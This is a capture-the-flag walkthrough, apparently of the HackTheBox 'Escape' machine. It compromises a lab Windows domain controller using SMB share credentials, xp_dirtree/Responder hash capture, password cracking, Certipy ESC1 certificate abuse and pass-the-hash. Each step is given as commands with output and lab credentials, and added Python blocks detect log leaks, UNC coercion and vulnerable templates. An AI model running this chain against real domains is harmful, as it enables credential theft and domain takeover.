Basic information

Port scan

Windows domain target; 445 and 1433 are open as well:

$ nmap -sC -sV -Pn 10.10.11.202
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 14:57 CST
Nmap scan report for 10.10.11.202
Host is up (0.081s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-28 14:58:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:30+00:00; +8h00m01s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-02-28T14:54:27
|_Not valid after: 2053-02-28T14:54:27
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:30+00:00; +8h00m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-02-28T14:58:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds

SMB

SMB allows anonymous access; a PDF is found in the Public share:

smbclient -N -L 10.10.11.202
smbclient -N //10.10.11.202/Public
get "SQL Server Procedures.pdf"

SQL Server Procedures.pdf

The PDF gives the MSSQL account and password:

PublicUser
GuestUserCantWrite1

MSSQL

Connect with the obtained credentials:

impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202

The usual Responder + xp_dirtree combination yields the sql_svc hash:

sudo python3 Responder.py -i 10.10.14.9 -v

SQL> exec xp_dirtree '\\10.10.14.9\miao'

The cracked password:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

REGGIE1234ronnie (sql_svc)

sql_svc

Log in with the obtained password; this is not yet the user account:

evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

Browsing the file system reveals a log file in C:\SQLServer\logs that contains another user's credentials; it simulates the scenario in which a user's account and password, used to log in to the database, end up recorded in the log:

sequel.htb\Ryan.Cooper
NuclearMosquito3
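Both the xp_dirtree coercion above and the credentials found in the SQL Server log leave traces a defender can look for. The following is an added example (not code from the original writeup, Responder or Impacket) that runs two checks over constructed input: it pairs a failed domain-account login with a later "login not found" failure from the same client (the classic sign that a password was typed into the user-name field and is now sitting in the ERRORLOG), and it flags extended stored procedures called with a UNC path to a host outside an allow-list. The log lines, statements, hosts and allow-list are all constructed for the example; the ERRORLOG line layout follows what the Logon source writes for error 18456.

```python
import re
from datetime import datetime

# Constructed SQL Server ERRORLOG-style lines (not from the target machine).
SAMPLE_ERRORLOG = """\
2023-02-28 10:01:12.10 Logon       Error: 18456, Severity: 14, State: 8.
2023-02-28 10:01:12.10 Logon       Login failed for user 'sequel.htb\\alice'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2023-02-28 10:01:15.42 Logon       Error: 18456, Severity: 14, State: 5.
2023-02-28 10:01:15.42 Logon       Login failed for user 'Winter2023!'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2023-02-28 10:05:00.00 Logon       Error: 18456, Severity: 14, State: 5.
2023-02-28 10:05:00.00 Logon       Login failed for user 'svc_backup'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.9]
"""

# Constructed captured T-SQL statements, as a SQL Audit or Extended Events session might record them.
SAMPLE_STATEMENTS = [
    "exec xp_dirtree 'C:\\SQLServer\\backups'",
    "exec xp_dirtree '\\\\fileserver01\\share'",
    "EXEC master..xp_fileexist '\\\\10.10.14.9\\miao\\x'",
]

TS_FMT = "%Y-%m-%d %H:%M:%S.%f"
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\S+ \S+) Logon\s+Login failed for user '(?P<user>[^']*)'\. "
    r"Reason: (?P<reason>[^.]+)\. \[CLIENT: (?P<client>[^\]]+)\]$"
)
# Extended stored procedures that take a path and will authenticate to a UNC host.
UNC_XP = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b\s*'?(\\\\[^\\'\s]+)", re.IGNORECASE)


def find_credential_leaks(log_text, window_s=60, redact=True):
    """Report failed-password logins that are followed, from the same client and
    within window_s seconds, by a failure for an unknown login name: that unknown
    name is very likely the account's password.  The leaked value is redacted by
    default so the finding can be shared; the follow-up is to scrub the log and
    rotate the account's password."""
    events = []
    for line in log_text.splitlines():
        m = LOGIN_FAILED.match(line)
        if m:
            events.append((datetime.strptime(m["ts"], TS_FMT), m["user"], m["reason"], m["client"]))
    leaks = []
    for i, (ts, user, reason, client) in enumerate(events):
        if not reason.startswith("Password did not match"):
            continue
        for ts2, user2, reason2, client2 in events[i + 1:]:
            if (ts2 - ts).total_seconds() > window_s:
                break  # events are chronological; nothing later is in the window
            if client2 == client and reason2.startswith("Could not find a login"):
                leaks.append({
                    "account": user,
                    "client": client,
                    "timestamp": ts2.isoformat(),
                    "leaked_value": "<redacted>" if redact else user2,
                })
                break
    return leaks


def find_unc_coercion(statements, allowed_hosts):
    """Return (procedure, host, statement) for every path-taking extended stored
    procedure pointed at a UNC host that is not on the allow-list."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for stmt in statements:
        m = UNC_XP.search(stmt)
        if not m:
            continue  # local path or no UNC argument
        host = m.group(2)[2:]  # strip the leading "\\"
        if host.lower() not in allowed:
            hits.append((m.group(1).lower(), host, stmt))
    return hits


if __name__ == "__main__":
    for leak in find_credential_leaks(SAMPLE_ERRORLOG):
        print("possible password in ERRORLOG:", leak)
    for proc, host, stmt in find_unc_coercion(SAMPLE_STATEMENTS, {"fileserver01"}):
        print(f"{proc} pointed at non-approved host {host}: {stmt}")
```

Run against a real ERRORLOG, the first check is worth scheduling: the sooner a password-in-username event is caught, the sooner the account is rotated and the log redacted. The second check is only as good as the source of the statements, so the server needs a SQL Audit or Extended Events session that records calls to xp_dirtree and friends.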

user flag

Log in with the credentials obtained from the SQL log; the user flag is on the desktop:

evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3

ADCS

The privilege escalation part is ADCS, which can be done remotely with Certipy:

Finding the vulnerable certificate template:

certipy find -vulnerable -stdout -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -dc-ip 10.10.11.202

Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA

ESC1

Following the ESC1 exploitation steps from the documentation one by one gives the administrator's NTLM hash:

certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -target 10.10.11.202 -template UserAuthentication -ca sequel-DC-CA -upn administrator@sequel.htb -dns 10.10.11.202 -dc-ip 10.10.11.202

# auth may fail with a clock skew error; sync the time with NTP first
sudo ntpdate -s 10.10.11.202

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.202

[*] Got NT hash for 'administrator@sequel.htb': a52f78e4c751e5f5e17e1e9f3e58f4ee
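The template flagged by certipy find and the ESC1 chain above both come down to a handful of template attributes. The following is an added example (not code from the original writeup or from Certipy) that audits those attributes the way a defender would before an attacker finds them: a template is ESC1-vulnerable only when the enrollee may supply the subject, no manager approval or authorized signature is required, the EKU permits domain authentication, and a low-privileged principal can enroll. The flag bits and EKU OIDs are the documented values; the template records, including the attribute values given to UserAuthentication, are constructed for this example because the writeup only names the template and CA.

```python
from dataclasses import dataclass, replace

# Documented bit flags (MS-CRTD) and EKU OIDs.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # in msPKI-Enrollment-Flag: manager approval

AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


@dataclass
class Template:
    name: str
    certificate_name_flag: int   # msPKI-Certificate-Name-Flag
    enrollment_flag: int         # msPKI-Enrollment-Flag
    ra_signature: int            # msPKI-RA-Signature: number of required signatures
    ekus: frozenset              # pKIExtendedKeyUsage OIDs (empty = any purpose)
    enroll_principals: frozenset  # principals granted Enroll in the template ACL


def esc1_findings(t):
    """Return the ESC1 conditions this template satisfies; all five must hold
    for the template to be exploitable."""
    findings = []
    if t.certificate_name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject (requester chooses the SAN)")
    if not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval required")
    if t.ra_signature == 0:
        findings.append("no authorized signature required")
    if not t.ekus or t.ekus & AUTH_EKUS:
        findings.append("EKU allows domain authentication")
    low = t.enroll_principals & LOW_PRIV_PRINCIPALS
    if low:
        findings.append(f"low-privileged enrollment: {', '.join(sorted(low))}")
    return findings


def is_esc1_vulnerable(t):
    return len(esc1_findings(t)) == 5


def harden(t):
    """Corrected copy of the template: the requester may no longer supply the
    subject, so the SAN is built from the requester's own AD object."""
    return replace(t, certificate_name_flag=t.certificate_name_flag & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)


# Constructed attribute values for the two templates below.
VULNERABLE_TEMPLATE = Template(
    name="UserAuthentication",
    certificate_name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    enrollment_flag=0,
    ra_signature=0,
    ekus=frozenset({"1.3.6.1.5.5.7.3.2"}),
    enroll_principals=frozenset({"Domain Users"}),
)
SAFE_TEMPLATE = Template(
    name="ComputerAuth (constructed)",
    certificate_name_flag=0,  # subject comes from the AD object
    enrollment_flag=0,
    ra_signature=0,
    ekus=frozenset({"1.3.6.1.5.5.7.3.2"}),
    enroll_principals=frozenset({"Domain Computers"}),
)


def audit(templates):
    """Map template name -> list of ESC1 conditions, only for vulnerable templates."""
    return {t.name: esc1_findings(t) for t in templates if is_esc1_vulnerable(t)}


if __name__ == "__main__":
    for name, findings in audit([VULNERABLE_TEMPLATE, SAFE_TEMPLATE]).items():
        print(f"{name}: ESC1")
        for f in findings:
            print("  -", f)
    print("after hardening:", audit([harden(VULNERABLE_TEMPLATE)]))
```

Clearing ENROLLEE_SUPPLIES_SUBJECT is the fix that addresses the root cause; requiring manager approval or narrowing the Enroll ACL also breaks the chain but leaves the template one ACL mistake away from being exploitable again.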

root flag

Log in with the obtained hash:

evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

References